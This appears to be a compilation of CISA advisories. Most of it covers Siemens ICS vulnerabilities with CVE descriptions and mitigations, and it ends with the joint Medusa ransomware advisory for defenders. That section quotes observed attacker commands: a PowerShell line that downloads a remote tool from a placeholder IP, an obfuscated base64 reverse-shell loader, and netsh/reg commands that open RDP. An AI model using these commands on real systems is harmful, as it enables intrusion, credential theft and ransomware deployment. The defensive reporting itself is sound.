OpenVPN from 2.6.0 through 2.6.10 in a server role accepts multiple exit notifications from authenticated clients which will extend the validity of a closing session.
CVE-2024-28882 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N).
A CVSS v4 score has also been calculated for CVE-2024-28882. A base score of 7.1 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N).
Siemens reported these vulnerabilities to CISA.
Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-615740 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of these vulnerabilities could allow an attacker to execute commands on the device with root privileges and access sensitive data.
Siemens reports that the following products are affected:
Affected devices expose several MQTT URLs without authentication. This could allow an unauthenticated remote attacker to access sensitive data.
CVE-2024-52285 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2024-52285. A base score of 6.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N).
Affected devices improperly sanitize user input for specific commands on the telnet command line interface. This could allow an authenticated local administrator to escalate privileges by injecting arbitrary commands that are executed with root privileges.
CVE-2025-27493 has been assigned to this vulnerability. A CVSS v3 base score of 8.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-27493. A base score of 9.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).
Affected devices improperly sanitize input for the pubkey endpoint of the REST API. This could allow an authenticated remote administrator to escalate privileges by injecting arbitrary commands that are executed with root privileges.
CVE-2025-27494 has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-27494. A base score of 9.4 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).
Airbus Security reported these vulnerabilities to Siemens.
Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-515903 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of these vulnerabilities could allow an unauthorized attacker to read or delete arbitrary files or the entire file system of the device.
Siemens reports that the following products are affected:
The affected application does not properly restrict access to the file deletion functionality. This could allow an unauthorized attacker to delete files even when access to the system should be prohibited, resulting in potential data loss or unauthorized modification of system files.
CVE-2025-25266 has been assigned to this vulnerability. A CVSS v3 base score of 6.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L).
A CVSS v4 score has also been calculated for CVE-2025-25266. A base score of 7.0 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N).
The affected application does not properly restrict the scope of files accessible to the simulation model. This could allow an unauthorized attacker to compromise the confidentiality of the system.
CVE-2025-25267 has been assigned to this vulnerability. A CVSS v3 base score of 6.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
A CVSS v4 score has also been calculated for CVE-2025-25267. A base score of 6.9 has been calculated; the CVSS vector string is (CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N).
Siemens reported these vulnerabilities to CISA.
Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-507653 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely.
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of these vulnerabilities allow a remote attacker to execute arbitrary code, read and write arbitrary files, escalate privileges, or execute a limited set of binaries that are present on the filesystem
Siemens reports that the following products are affected:
Affected devices do not properly sanitize user input when creating new VXLAN configurations. This could allow an authenticated highly-privileged remote attacker to execute arbitrary code on the device.
CVE-2025-27392 has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-27392. A base score of 8.6 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Affected devices do not properly sanitize user input when creating new users. This could allow an authenticated highly-privileged remote attacker to execute arbitrary code on the device.
CVE-2025-27393 has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-27393. A base score of 8.6 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Affected devices do not properly sanitize user input when creating new SNMP users. This could allow an authenticated highly-privileged remote attacker to execute arbitrary code on the device.
CVE-2025-27394 has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-27394. A base score of 8.6 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Affected devices do not properly limit the scope of files accessible through and the privileges of the SFTP functionality. This could allow an authenticated highly-privileged remote attacker to read and write arbitrary files.
CVE-2025-27395 has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-27395. A base score of 8.6 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Affected devices do not properly limit the elevation of privileges required to perform certain valid functionality. This could allow an authenticated lowly-privileged remote attacker to escalate their privileges.
CVE-2025-27396 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2025-27396. A base score of 8.7 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
Affected devices do not properly limit user controlled paths to which logs are written and from where they are read. This could allow an authenticated highly-privileged remote attacker to read and write arbitrary files in the filesystem, if and only if the malicious path ends with 'log' .
CVE-2025-27397 has been assigned to this vulnerability. A CVSS v3 base score of 3.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2025-27397. A base score of 5.1 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N).
Affected devices do not properly neutralize special characters when interpreting user controlled log paths. This could allow an authenticated highly-privileged remote attacker to execute a limited set of binaries that are already present on the filesystem.
CVE-2025-27398 has been assigned to this vulnerability. A CVSS v3 base score of 2.7 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2025-27398. A base score of 2.1 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N).
Siemens reported these vulnerabilities to CISA.
Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-075201 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of this vulnerability could allow an attacker to download untrusted firmware that could damage or compromise the device.
Siemens reports that the following products are affected:
The affected device contains an unlocked bootloader. This security oversight enables attackers to inject malicious code or to install untrusted firmware. The intrinsic security features designed to protect against data manipulation and unauthorized access are compromised when the bootloader is not secured.
CVE-2024-56336 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-56336. A base score of 9.5 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H).
Siemens reported this vulnerability to CISA.
Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-787280 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code, cause a denial-of-service condition, or gain unauthorized access to sensitive information.
Siemens reports that the following products are affected:
In the Linux kernel, the following vulnerability has been resolved: net: ethernet: lantiq_etop: fix double free in detach. The number of the currently released descriptor is never incremented, which results in the same skb being released multiple times.
CVE-2024-41046 has been assigned to this vulnerability. A CVSS v3 base score of 5.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
In the Linux kernel, the following vulnerability has been resolved: filelock: fix potential use-after-free in posix_lock_inode Light Hsieh reported a KASAN UAF warning in trace_posix_lock_inode(). The request pointer had been changed earlier to point to a lock entry that was added to the inode's list. However, before the tracepoint could fire, another task raced in and freed that lock. Fix this by moving the tracepoint inside the spinlock, which should ensure that this doesn't happen.
CVE-2024-41049 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
In the Linux kernel, the following vulnerability has been resolved: mm: prevent derefencing NULL ptr in pfn_section_valid() Commit 5ec8e8ea8b77 ("mm/sparsemem: fix race in accessing memory_section->usage") changed pfn_section_valid() to add a READ_ONCE() call around "ms->usage" to fix a race with section_deactivate() where ms->usage can be cleared. The READ_ONCE() call, by itself, is not enough to prevent NULL pointer dereference. We need to check its value before dereferencing it.
CVE-2024-41055 has been assigned to this vulnerability. A CVSS v3 base score of 5.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
In the Linux kernel, the following vulnerability has been resolved: tcp_metrics: validate source addr length I don't see anything checking that TCP_METRICS_ATTR_SADDR_IPV4 is at least 4 bytes long, and the policy doesn't have an entry for this attribute at all (neither does it for IPv6 but v6 is manually validated).
CVE-2024-42154 has been assigned to this vulnerability. A CVSS v3 base score of 5.5 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
In the Linux kernel, the following vulnerability has been resolved: bpf: Avoid uninitialized value in BPF_CORE_READ_BITFIELD.
CVE-2024-42161 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
Siemens reported these vulnerabilities to CISA.
Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-503939 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely.
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
Successful exploitation of this vulnerability could allow an attacker to obtain partial invalid usernames accepted by the server. A remote attacker would need access to a valid certificate in order to perform a successful attack.
Siemens reports that the following products are affected:
Affected devices improperly validate usernames during OpenVPN authentication. This could allow an attacker to get partial invalid usernames accepted by the server.
CVE-2025-23384 has been assigned to this vulnerability. A CVSS v3 base score of 3.7 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
A CVSS v4 score has also been calculated for CVE-2025-23384. A base score of 6.3 has been calculated; the CVSS vector string is (CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N).
Siemens reported this vulnerability to CISA.
Siemens has identified the following specific workarounds and mitigations users can apply to reduce risk:
As a general security measure, Siemens recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for industrial security and following recommendations in the product manuals.
Additional information on industrial security by Siemens can be found on the Siemens industrial security webpage
For more information see the associated Siemens security advisory SSA-280834 in HTML and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability has a high attack complexity.
Today, CISA—in partnership with the Federal Bureau of Investigation (FBI) and Multi-State Information Sharing and Analysis Center (MS-ISAC)—released joint Cybersecurity Advisory, #StopRansomware: Medusa Ransomware. This advisory provides tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and detection methods associated with known Medusa ransomware activity.
Medusa is a ransomware-as-a-service variant used to conduct ransomware attacks; as of December 2024, over 300 victims from critical infrastructure sectors have been impacted. Medusa actors use common techniques like phishing campaigns and exploiting unpatched software vulnerabilities.
Immediate actions organizations can take to mitigate Medusa ransomware activity:
CISA encourages network defenders to review the advisory and implement the recommended mitigations to reduce the likelihood and impact of Medusa ransomware incidents. See #StopRansomware and the #StopRansomware Guide for additional guidance on ransomware protection, detection, and response.
Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.
Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI’s investigation.
FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.
Download the PDF version of this report:
AA25-071A #StopRansomware: Medusa Ransomware (PDF, 672.45 KB )For a downloadable list of IOCs, see:
AA25-071A STIX XML (XML, 34.30 KB ) AA25-071A STIX JSON (JSON, 42.28 KB )Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.
Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [TA0001] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as:
Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. Once a foothold in a victim network is established, commonly scanned ports include:
21 (FTP)22 (SSH)23 (Telnet)80 (HTTP)115 (SFTP)443 (HTTPS)1433 (SQL database)3050 (Firebird database)3128 (HTTP web proxy)3306 (MySQL database)3389 (RDP)Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. Medusa actors use Windows Management Instrumentation (WMI) [T1047] for querying system information.
Medusa actors use LOTL to avoid detection [TA0005]. (See Appendix A for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (certutil.exe) is used to avoid detection when performing file ingress.
Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [T1070.003].
In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [T1027.013] using specific execution settings.
powershell -exec bypass -enc <base64 encrypted command string>In another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [T1027].
powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RAS tool>.msi)In the final example, the payload is an obfuscated base64 string read into memory, decompressed from gzip, and used to create a scriptblock. The base64 payload is split using empty strings and concatenation, and uses a format operator (-f) followed by three arguments to specify character replacements in the base64 payload.
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('<base64 payload string>')-f'<character replacement 0>','<character replacement 1>', '<character replacement 2>')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))The obfuscated base64 PowerShell payload is identical to powerfun.ps1, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port 443 [T1071.001], and initiates a connection to a remote port 443 in the reverse shell.
In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [T1562.001].
FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection:
Medusa actors use a variety of legitimate remote access software [T1219]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [T1021.001] and PsExec [T1569.002]—to move laterally [TA0008] through the network and identify files for exfiltration [TA0010] and encryption [T1486]. When provided with valid username and password credentials, Medusa actors use PsExec to:
-c) one script from various batch scripts on the current machine to the remote machine and execute it with SYSTEM level privileges (-s).SYSTEM level privileges.cmd /c.One of the batch scripts executed by PsExec is openrdp.bat, which first creates a new firewall rule to allow inbound TCP traffic on port 3389:
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allowThen, a rule to allow remote WMI connections is created:
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yesFinally, the registry is modified to allow Remote Desktop connections:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fMimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [T1003.001] to harvest credentials [TA0006] and aid lateral movement.
Medusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072] to deploy the encryptor, gaze.exe, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a .medusa file extension. The process gaze.exe terminates all services [T1489] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [T1490] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [T1529] and encrypt virtual machines and delete their previously installed tools [T1070].
Medusa RaaS employs a double extortion model, where victims must pay [T1657] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a .onion data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.
FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme.
